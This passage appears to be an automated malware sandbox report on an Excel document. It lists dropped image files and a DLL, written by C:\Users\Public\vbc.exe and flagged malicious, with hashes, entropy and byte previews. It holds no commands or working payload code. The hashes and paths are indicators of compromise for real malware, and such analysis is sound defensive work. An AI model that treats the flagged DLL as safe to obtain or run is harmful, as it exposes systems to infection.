                                        Size (bytes):498420
                                        Entropy (8bit):0.6413582634752348
                                        Encrypted:false
                                        SSDEEP:384:mZIXXwBkNWZ3cJuUvmWnTG+W4DH8ddxzsFfW3:moXwBkNWZ3cjvmWa+VDO
                                        MD5:1E7A8CBA90D89CD1D5710C1FF7FA77A7
                                        SHA1:CC5412614638647C010B300E0149777638DAF3D7
                                        SHA-256:64BDD89994D6E14E386C35BB48DA739AA156F2453B47F810EE4D51461723B12B
                                        SHA-512:E75011D87322A2111FF322AB4A98A1A55C68BB08E158D92834B0818EBA216C16A7373ECF7C28C9CCD5FE017E7E886C26532191AFAA80892EB5806930C6A8F28E
                                        Malicious:false
                                        Preview: ....l...............2...........m>..C... EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................Y$...X...f.Y.@$.%...4..x.........\..RQ>[..........D.....$Q>[...... ...Id.Y...... ............d.Y........................................%...X...%...7...................{$..................C.a.l.i.b.r.i...........h..X..........8.Y........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@....2.......L.......................P... ...6...F....F...F..EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5EF52A6.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 600 x 306, 8-bit colormap, non-interlaced
                                        Category:dropped
                                        Size (bytes):42465
                                        Entropy (8bit):7.979580180885764
                                        Encrypted:false
                                        SSDEEP:768:MUC94KctLo6+FkVfaapdydSo7CT3afPFUaV8v9TIzsrZsQ54kvd8gjDsss2Ur6:MJctLo63a8dydV+3WOa+90sZsSyMs+
                                        MD5:C31D090D0B6B5BCA539D0E9DB0C57026
                                        SHA1:D00CEE7AEE3C98505CDF6A17AF0CE28F2C829886
                                        SHA-256:687AFECEE6E6E286714FD267E0F6AC74BCA9AC6469F4983C3EF7168C65182C8D
                                        SHA-512:B23CA96097C2F5ED8CC251C0D6A34F643EE2251FDF3DEF6A962A168D82385CFEE2328D39FF86AADEA5EDBBF4D35882E6CD9CF8ECE43A82BD8F06383876B24756
                                        Malicious:false
                                        Preview: .PNG........IHDR...X...2......?^O..._PLTE.......................................................................gbh................j...^k....-.........................................>Jg......h..m.............l`.......qjG.9\LC..........u.*.'.................//F.......h.++..j...e....A.H?>.......|DG...........G./.`<..G...O:R..j...................................................tRNS.@..f...0IDATx..Z.s.4.]:.".F..Y.5.4!...WhiM..]Cv.Q......e.....x....~...x.g.%K.....X.....brG..sW:~g.Tu...U.R...W.V.U#TAr?..?}.C3.K...P..n..A..av?C..J.}.e.]...CA._y......~.2.^..Z..'...@......)....s.(...ey......{.)e..*]\-..yG2Ne.B....\@q....8.....W./i.C..P.*...O..e..7./..k:..t....]"../...F......y.......0`.3..g.)..Z...tR.bU.].B.Y...Ri^.R......D.*........=(tL.W.y....n.\.s..D.5.....c....8A....:;.)..].a]...;B0...B.0&@*.+..2..4....-X.>)..h~.J..".nO=VV.t...q..5......f.h......DPyJ*....E..:.....K.... ......E.%i..C..V..\.......z.^.r7.V...q.`....3..E3J8Ct.Z.l.GI.).R!b
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\632450BE.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):68702
                                        Entropy (8bit):7.960564589117156
                                        Encrypted:false
                                        SSDEEP:1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
                                        MD5:9B8C6AB5CD2CC1A2622CC4BB10D745C0
                                        SHA1:E3C68E3F16AE0A3544720238440EDCE12DFC900E
                                        SHA-256:AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
                                        SHA-512:407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
                                        Malicious:false
                                        Preview: .PNG........IHDR.....................pHYs..........+......tIME......&...T....tEXtAuthor....H....tEXtDescription...!#....tEXtCopyright....:....tEXtCreation time.5.......tEXtSoftware.]p.:....tEXtDisclaimer.........tEXtWarning........tEXtSource.........tEXtComment........tEXtTitle....'.. .IDATx...y|T.?..l..3. .$.D..(v....Q.q.....W.[...Z..-.*Hlmm...4V..BU..V@,h.t.....}...cr.3.......B3s.....|.}.G6j.t.Qv..-Q9...r\"""""""".H9...Y..*.v...........7........Q..^t{P..C..""""""""".e..n@7B.{Q.S.HDDDDDDDD...........\bxHDDDDDDDDD.1<$""""""""......d2Y@9`@c.v..8P...0`..a|.....<... ..+...[""""""""".....~..,........+.t..._..o.....8z.$ ..U.Mp".....Z8.a;.B..'...y..I^......e........,}.+.M..K...M...A.7.Z[[.E.....B...nF.:5.."""""""".(.....d.3*..E.=...[o...o.....n..._.{..-..M.3....px(.5..4lt..&....d.R!.......!.$''.n.....X,..__ar.d..0 .M#"""""""..S...T...Ai.8P^XX(..d.....u[.f...8........[`...q..9R../.....v.b.5.r`.[.A..a.....a6......S.o.h7...........g..v..+.~.oB.H..|..8...
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6391CDA7.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
                                        Category:dropped
                                        Size (bytes):14828
                                        Entropy (8bit):7.9434227607871355
                                        Encrypted:false
                                        SSDEEP:384:zIZYVvfv3ZOxvHe5EmlbliA2r1BMWWTXRRO/QX:Td3Z46xiXzW/kO
                                        MD5:58DD6AF7C438B638A88D107CC87009C7
                                        SHA1:F25E7F2F240DC924A7B48538164A5B3A54E91AC6
                                        SHA-256:9269180C35F7D393AB5B87FB7533C2AAA2F90315E22E72405E67A0CAC4BA453A
                                        SHA-512:C1A3543F221FE7C2B52C84F6A12607AF6DAEF60CCB1476D6D3E957A196E577220801194CABC18D6A9A8269004B732F60E1B227C789A9E95057F282A54DBFC807
                                        Malicious:false
                                        Preview: .PNG........IHDR.............L.!... .IDATx..gp\.y>~v...WTb... ...!.M.H...d.J..3.8.(.L&.lM.d.o..$..q.D.I.....k,J.b3%QD!.Bt,.........p.+.....x?`....{.9o..W.q.Y.gM.g=.5"dm.V..M...iX..6....g=.R(..N'.0&.I(..B2..\...|.t......R.T.......J...Q.U....F.I..B.\...B.Z-....D")..,.J.....u..1.#....A.P.i..!...3.U1....RI..9....:..~..r..N.....Je,...l...(..CCC...v....a.l6KQ...ooo...d.fxx...k``...5.N.\.S.N...e2............b..7..8@.tgg.}..Ue7..e.G .`.J.d2)..B!M..r..T*Q.%..X.......{....,.q.\,.E".........z..*.abbB*...j.\.J.(.b.......|>...........R....L&..X.eYV"..-.R)B.T*M&..pX*.j.Z..9..F.Z.6....b.\./%..~...).B<..T*.z..D"..(...\...d2YKKK...mm.T*..l.T*..I$.x<..J..q..*.J .X..O>...C.d2.JI...:...#....xkk.B.(....D .8..t:..o>...:vC%MNNj.ZHZ....`.T....,...A.....l$.q.\f.....eY..8.+....`dd.b.X,.BH.T..4-..x.EV.|&.p.......O.P(.J.\>66.a.X,...><<....V.R.T*....d2.;v.....W.511.u.a....'..'...zkk.m.t:]__...ggg.o.............Y..z..a.....{..%.H..f...nw*..........'ND"...P(D"... .H..|>/.Hd2....EQ.
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7BBEB2B.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 338 x 143, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):6364
                                        Entropy (8bit):7.935202367366306
                                        Encrypted:false
                                        SSDEEP:192:joXTTTt+cmcZjbF/z2sA9edfxFHTeDELxExDR:joXTTTEc5ZjR/zI9EfjTeDEGxDR
                                        MD5:A7E2241249BDCC0CE1FAAF9F4D5C32AF
                                        SHA1:3125EA93A379A846B0D414B42975AADB72290EB4
                                        SHA-256:EC022F14C178543347B5F2A31A0BFB8393C6F73C44F0C8B8D19042837D370794
                                        SHA-512:A5A49B2379DF51DF5164315029A74EE41A2D06377AA77D24A24D6ADAFD3721D1B24E5BCCAC72277BF273950905FD27322DBB42FEDA401CA41DD522D0AA30413C
                                        Malicious:false
                                        Preview: .PNG........IHDR...R...........S.....sRGB.........gAMA......a.....pHYs..........o.d...!tEXtCreation Time.2018:08:27 10:23:35Z......DIDATx^....M......3c0f0.2.9o.......-..r..:.V*.ty..MEJ.^.$G.T.AJ.J.n.....0.`...B...g=....{..5.1...|.g.z..Y.._...3k..y............@JD...)..KQ.........f.DD.1.....@JD...)..K..DD.1.....@JD...)..K..DD.1.....@JD...)..K..DD.....9.sdKv.\.R[...k...E..3....ee.!..Wl...E&6.\.]..'K...x.O..%.EE..'...}..[c....?n..R...V..U5!.Rt...-xw*.....#..._....I....k.!":...H.....eKN.....9....{%......*7..6Y..".....P....."ybQ.....JJ`z..%..a.$<m.n'..[.f0~..r.........-.q...{.Mu3.yX...\...5.a.zNX.9..-.[......QU.r .qZ...&.{....$..`.Lu..]Z^'.].k|.z.3....H.../...k7.1>y.D..._x...........=.u.?ee.9.'.11:={.t]....)..k...F@P|f....9...K>...{...}...h9.b..h....w.....A~...u..j.9..x..C=.JJ.h....K2.... .../I..=3C.6k.]...JD.....:tP.e...-+*...}..\.Yrss4...i.f..A7I...u.M....v.uY_.V|.].-Oo..........._.;@c....`.....|.R7>^...j*S...{...w.iV..UR..SJ.hy.W3...2Q@f......,.....
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\881D373.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                        Category:dropped
                                        Size (bytes):11303
                                        Entropy (8bit):7.909402464702408
                                        Encrypted:false
                                        SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                        MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                        SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                        SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                        SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                        Malicious:false
                                        Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BA4B566F.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):68702
                                        Entropy (8bit):7.960564589117156
                                        Encrypted:false
                                        SSDEEP:1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
                                        MD5:9B8C6AB5CD2CC1A2622CC4BB10D745C0
                                        SHA1:E3C68E3F16AE0A3544720238440EDCE12DFC900E
                                        SHA-256:AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
                                        SHA-512:407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
                                        Malicious:false
                                        Preview: .PNG........IHDR.....................pHYs..........+......tIME......&...T....tEXtAuthor....H....tEXtDescription...!#....tEXtCopyright....:....tEXtCreation time.5.......tEXtSoftware.]p.:....tEXtDisclaimer.........tEXtWarning........tEXtSource.........tEXtComment........tEXtTitle....'.. .IDATx...y|T.?..l..3. .$.D..(v....Q.q.....W.[...Z..-.*Hlmm...4V..BU..V@,h.t.....}...cr.3.......B3s.....|.}.G6j.t.Qv..-Q9...r\"""""""".H9...Y..*.v...........7........Q..^t{P..C..""""""""".e..n@7B.{Q.S.HDDDDDDDD...........\bxHDDDDDDDDD.1<$""""""""......d2Y@9`@c.v..8P...0`..a|.....<... ..+...[""""""""".....~..,........+.t..._..o.....8z.$ ..U.Mp".....Z8.a;.B..'...y..I^......e........,}.+.M..K...M...A.7.Z[[.E.....B...nF.:5.."""""""".(.....d.3*..E.=...[o...o.....n..._.{..-..M.3....px(.5..4lt..&....d.R!.......!.$''.n.....X,..__ar.d..0 .M#"""""""..S...T...Ai.8P^XX(..d.....u[.f...8........[`...q..9R../.....v.b.5.r`.[.A..a.....a6......S.o.h7...........g..v..+.~.oB.H..|..8...
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CF128ED8.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 338 x 143, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):6364
                                        Entropy (8bit):7.935202367366306
                                        Encrypted:false
                                        SSDEEP:192:joXTTTt+cmcZjbF/z2sA9edfxFHTeDELxExDR:joXTTTEc5ZjR/zI9EfjTeDEGxDR
                                        MD5:A7E2241249BDCC0CE1FAAF9F4D5C32AF
                                        SHA1:3125EA93A379A846B0D414B42975AADB72290EB4
                                        SHA-256:EC022F14C178543347B5F2A31A0BFB8393C6F73C44F0C8B8D19042837D370794
                                        SHA-512:A5A49B2379DF51DF5164315029A74EE41A2D06377AA77D24A24D6ADAFD3721D1B24E5BCCAC72277BF273950905FD27322DBB42FEDA401CA41DD522D0AA30413C
                                        Malicious:false
                                        Preview: .PNG........IHDR...R...........S.....sRGB.........gAMA......a.....pHYs..........o.d...!tEXtCreation Time.2018:08:27 10:23:35Z......DIDATx^....M......3c0f0.2.9o.......-..r..:.V*.ty..MEJ.^.$G.T.AJ.J.n.....0.`...B...g=....{..5.1...|.g.z..Y.._...3k..y............@JD...)..KQ.........f.DD.1.....@JD...)..K..DD.1.....@JD...)..K..DD.1.....@JD...)..K..DD.....9.sdKv.\.R[...k...E..3....ee.!..Wl...E&6.\.]..'K...x.O..%.EE..'...}..[c....?n..R...V..U5!.Rt...-xw*.....#..._....I....k.!":...H.....eKN.....9....{%......*7..6Y..".....P....."ybQ.....JJ`z..%..a.$<m.n'..[.f0~..r.........-.q...{.Mu3.yX...\...5.a.zNX.9..-.[......QU.r .qZ...&.{....$..`.Lu..]Z^'.].k|.z.3....H.../...k7.1>y.D..._x...........=.u.?ee.9.'.11:={.t]....)..k...F@P|f....9...K>...{...}...h9.b..h....w.....A~...u..j.9..x..C=.JJ.h....K2.... .../I..=3C.6k.]...JD.....:tP.e...-+*...}..\.Yrss4...i.f..A7I...u.M....v.uY_.V|.].-Oo..........._.;@c....`.....|.R7>^...j*S...{...w.iV..UR..SJ.hy.W3...2Q@f......,.....
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DBF350F9.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):10202
                                        Entropy (8bit):7.870143202588524
                                        Encrypted:false
                                        SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                        MD5:66EF10508ED9AE9871D59F267FBE15AA
                                        SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                        SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                        SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                        Malicious:false
                                        Preview: .PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EB1A9DA4.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
                                        Category:dropped
                                        Size (bytes):14828
                                        Entropy (8bit):7.9434227607871355
                                        Encrypted:false
                                        SSDEEP:384:zIZYVvfv3ZOxvHe5EmlbliA2r1BMWWTXRRO/QX:Td3Z46xiXzW/kO
                                        MD5:58DD6AF7C438B638A88D107CC87009C7
                                        SHA1:F25E7F2F240DC924A7B48538164A5B3A54E91AC6
                                        SHA-256:9269180C35F7D393AB5B87FB7533C2AAA2F90315E22E72405E67A0CAC4BA453A
                                        SHA-512:C1A3543F221FE7C2B52C84F6A12607AF6DAEF60CCB1476D6D3E957A196E577220801194CABC18D6A9A8269004B732F60E1B227C789A9E95057F282A54DBFC807
                                        Malicious:false
                                        Preview: .PNG........IHDR.............L.!... .IDATx..gp\.y>~v...WTb... ...!.M.H...d.J..3.8.(.L&.lM.d.o..$..q.D.I.....k,J.b3%QD!.Bt,.........p.+.....x?`....{.9o..W.q.Y.gM.g=.5"dm.V..M...iX..6....g=.R(..N'.0&.I(..B2..\...|.t......R.T.......J...Q.U....F.I..B.\...B.Z-....D")..,.J.....u..1.#....A.P.i..!...3.U1....RI..9....:..~..r..N.....Je,...l...(..CCC...v....a.l6KQ...ooo...d.fxx...k``...5.N.\.S.N...e2............b..7..8@.tgg.}..Ue7..e.G .`.J.d2)..B!M..r..T*Q.%..X.......{....,.q.\,.E".........z..*.abbB*...j.\.J.(.b.......|>...........R....L&..X.eYV"..-.R)B.T*M&..pX*.j.Z..9..F.Z.6....b.\./%..~...).B<..T*.z..D"..(...\...d2YKKK...mm.T*..l.T*..I$.x<..J..q..*.J .X..O>...C.d2.JI...:...#....xkk.B.(....D .8..t:..o>...:vC%MNNj.ZHZ....`.T....,...A.....l$.q.\f.....eY..8.+....`dd.b.X,.BH.T..4-..x.EV.|&.p.......O.P(.J.\>66.a.X,...><<....V.R.T*....d2.;v.....W.511.u.a....'..'...zkk.m.t:]__...ggg.o.............Y..z..a.....{..%.H..f...nw*..........'ND"...P(D"... .H..|>/.Hd2....EQ.
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F02D5955.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
                                        Category:dropped
                                        Size (bytes):19408
                                        Entropy (8bit):7.931403681362504
                                        Encrypted:false
                                        SSDEEP:384:6L3Vdo4yxL8FNgQ9jYtUO5Zn4tIlQ1Yes7D6PhbXngFfZdQTEfn4n6EVPBo6a:2exL8rgQ2tVF4GlQUuZXnYfTs6EJiL
                                        MD5:63ED10C9DF764CF12C64E6A9A2353D7D
                                        SHA1:608BE0D9462016EA4F05509704CE85F3DDC50E63
                                        SHA-256:4DAC3676FAA787C28DFA72B80FE542BF7BE86AAD31243F63E78386BC5F0746B3
                                        SHA-512:9C633C57445D67504E5C6FE4EA0CD84FFCFECFF19698590CA1C4467944CD69B7E7040551A0328F33175A1C698763A47757FD625DA7EF01A98CF6C585D439B4A7
                                        Malicious:false
                                        Preview: .PNG........IHDR.............L.!... .IDATx..g.].y&X'...{;.t@F. .. .D*Q.eI..#[.5~lK3...z.3.gw...^.=;.FV..%..d..%R..E......F.ts<..X..f..F..5|..s..:Uu.W.U....!.9...A..u/...g.w......lx...pG..2..x..w..!...w.pG..2..x..w..!.....m.a>.....R........x.IU[.A.....].Y.L..!....|AQ.h4....x..\6....|.i..]..Q..(...C..A..Z... (j.f4..u=..o.D.oj....y6......)I.......G.{zn.M,...?#..,...|....y....G.LOO..?.....7..-.>.._.m[.........q.O}..G....?....h4.=t..c...eY.........3g..|0...x...|..../F....o.._|...?.O..........c..x._..7vF..0.....B>.....}{..V....P(.....c.....4...s...K.K."c(.....}.0......._z...}..y<<.......<..^.7....k.r.W~..c._.....$J....:.w._~.........._..Wp.....q........G..vA.D.E......"...?...'....}nvv....^.^.42..f....Q(..$...`(vidd..8......y.Z{...L.~...k....z....@@0...Bk..?.r..7...9u...w.>w.C..j.n..a..V.?..?...es#.G...l.&I..)..).J..>...+Mn.^.W.._....D...".}..k......8.N_.v..>.y.@0..,/.........>.a...........z.].../.r .........../3.....?.z..g.Z.....l0.L.S....._../.r
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F2131971.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 600 x 306, 8-bit colormap, non-interlaced
                                        Category:dropped
                                        Size (bytes):42465
                                        Entropy (8bit):7.979580180885764
                                        Encrypted:false
                                        SSDEEP:768:MUC94KctLo6+FkVfaapdydSo7CT3afPFUaV8v9TIzsrZsQ54kvd8gjDsss2Ur6:MJctLo63a8dydV+3WOa+90sZsSyMs+
                                        MD5:C31D090D0B6B5BCA539D0E9DB0C57026
                                        SHA1:D00CEE7AEE3C98505CDF6A17AF0CE28F2C829886
                                        SHA-256:687AFECEE6E6E286714FD267E0F6AC74BCA9AC6469F4983C3EF7168C65182C8D
                                        SHA-512:B23CA96097C2F5ED8CC251C0D6A34F643EE2251FDF3DEF6A962A168D82385CFEE2328D39FF86AADEA5EDBBF4D35882E6CD9CF8ECE43A82BD8F06383876B24756
                                        Malicious:false
                                        Preview: .PNG........IHDR...X...2......?^O..._PLTE.......................................................................gbh................j...^k....-.........................................>Jg......h..m.............l`.......qjG.9\LC..........u.*.'.................//F.......h.++..j...e....A.H?>.......|DG...........G./.`<..G...O:R..j...................................................tRNS.@..f...0IDATx..Z.s.4.]:.".F..Y.5.4!...WhiM..]Cv.Q......e.....x....~...x.g.%K.....X.....brG..sW:~g.Tu...U.R...W.V.U#TAr?..?}.C3.K...P..n..A..av?C..J.}.e.]...CA._y......~.2.^..Z..'...@......)....s.(...ey......{.)e..*]\-..yG2Ne.B....\@q....8.....W./i.C..P.*...O..e..7./..k:..t....]"../...F......y.......0`.3..g.)..Z...tR.bU.].B.Y...Ri^.R......D.*........=(tL.W.y....n.\.s..D.5.....c....8A....:;.)..].a]...;B0...B.0&@*.+..2..4....-X.>)..h~.J..".nO=VV.t...q..5......f.h......DPyJ*....E..:.....K.... ......E.%i..C..V..\.......z.^.r7.V...q.`....3..E3J8Ct.Z.l.GI.).R!b
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FD326752.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                        Category:dropped
                                        Size (bytes):11303
                                        Entropy (8bit):7.909402464702408
                                        Encrypted:false
                                        SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                        MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                        SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                        SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                        SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                        Malicious:false
                                        Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                                        C:\Users\user\AppData\Local\Temp\nssE7A3.tmp\folvcfp.dll
                                        Process:C:\Users\Public\vbc.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):120832
                                        Entropy (8bit):6.282005604227144
                                        Encrypted:false
                                        SSDEEP:1536:QC73nuxwSHWtPMATKVLWKSg+ZuDZxinIKjyozssu03z+ICtrmlkx7SzmlonptA1q:ewqWtUpcU+Uin+ozvDGtN7su1fKuuJ
                                        MD5:CF3B520E83AF10CD581888715E23C700
                                        SHA1:A03E9DA020C79A0B110E05BB8CFFCAEC9275720B
                                        SHA-256:57E5B81AA1D1C628DD849E005E32B19A3DC3AF9E3F5797F5770AA2462D13B489
                                        SHA-512:A5E773947DE896269C9BA6E92731F69FBD3E5AF185A623321B3D98760F9C0287F92950E762C300AF498D9AB5F47D01ADC76B2C3CED2634F94DDFEB9C385D2C37
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x...+...+...+9u.+...+..9+...+...+...+..8+...+...*...+...*...+...*...+...+...+0..*...+0..*...+5.'+...+0..*...+Rich...+................PE..L...Y..a...........!.....l...h............................................... ......................................p...L...............................................................................@............................................text...4j.......l.................. ..`.bss....D................................rdata..rN.......P...p..............@..@.data...............................@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Temp\y6piyw2sm9gz
                                        Process:C:\Users\Public\vbc.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):216294
                                        Entropy (8bit):7.993636820458112
                                        Encrypted:true
                                        SSDEEP:6144:k6s9fJzSq1DVbiGQtqXsjh0xxYAUO/j4zRFWJl+:k6sLf1B6gsjh0xxYAJ4z/mk
                                        MD5:E76442BDF2DEBE302E1E2E2A90709AAE
                                        SHA1:9FD8EC630AE06DC5C09654237C97628F8822B902
                                        SHA-256:A44978D726C8B7792812E38267471DA5BC4D968944264E0F139EF1438133476F
                                        SHA-512:E45EDFDBE599321B7F46DBAAE242A7B179E09980EB3D89415456996368B454FEC1B4744DB906E5383A72112EE3CA421E81D771A7EE17B6FAE71BFE59320116A4
                                        Malicious:false
